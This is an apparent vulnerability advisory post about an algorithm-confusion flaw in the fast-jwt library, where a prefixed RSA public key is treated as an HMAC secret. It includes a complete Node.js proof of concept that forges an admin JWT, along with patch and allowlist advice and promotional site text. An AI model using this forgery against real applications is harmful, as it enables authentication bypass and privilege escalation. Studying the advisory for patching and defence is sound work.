fast-jwt, Incomplete Fix Algorithm Confusion, CVE-2026-34950 (critical) -DC-Oct2026-2985

Listen to this Post

The fix for CVE-2026-34950 in `fast-jwt` introduced an incomplete mitigation by utilizing key.trim(), which only strips standard ECMAScript whitespace characters. Because the subsequent regular expression relies on a start-of-string anchor (^), any non-whitespace leading bytes—such as control characters, zero-width Unicode, comments, or HTTP wrappers—prevent a successful match. This causes the validation logic to bypass public key identification entirely and fall back to the HMAC verification path. Consequently, an attacker can supply an RSA public key prefixed with non-whitespace content to force its use as an HMAC shared secret, completely re-enabling algorithm confusion and allowing arbitrary JWT forgery.

DailyCVE Form:

Platform: fast-jwt
Version: 6.2.2
Vulnerability : Algorithm Confusion
Severity: Critical
date: 2026-04-23

Prediction: 2026-05-01

What Undercode Say

The vulnerability stems from relying on `String.prototype.trim()` combined with a start-anchored regular expression (^). Because `trim()` leaves control characters, comments, and binary prefixes intact, the matcher fails position zero checks. The verification flow then seamlessly treats the public key material as a symmetric secret key for HMAC checks.

Exploit: (Educational Purposes!)

'use strict';
const { createHmac, generateKeyPairSync } = require('node:crypto');
const { createVerifier } = require('fast-jwt');
const { publicKey } = generateKeyPairSync('rsa', { modulusLength: 2048 });
const pem = publicKey.export({ type: 'pkcs1', format: 'pem' }).toString();
const key = ' some comment\n' + pem;
const header = Buffer.from(JSON.stringify({ alg: 'HS256', typ: 'JWT' })).toString('base64url');
const payload = Buffer.from(JSON.stringify({ admin: true, sub: 'attacker' })).toString('base64url');
const sig = createHmac('sha256', key).update(header + '.' + payload).digest('base64url');
const forgedToken = header + '.' + payload + '.' + sig;
const verifier = createVerifier({ key });
console.log('Forged token payload:', verifier(forgedToken));

Protection:

Update to version 6.2.4 or later where strict PEM boundary verification is enforced. Implement explicit algorithm allowlists in configuration parameters to reject unintended signature types like HS256 when using asymmetric keys.

Impact:

Enables complete authentication bypass. Malicious actors can forge arbitrary JSON Web Token claims including administrator privileges or tenant manipulation on vulnerable downstream applications.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top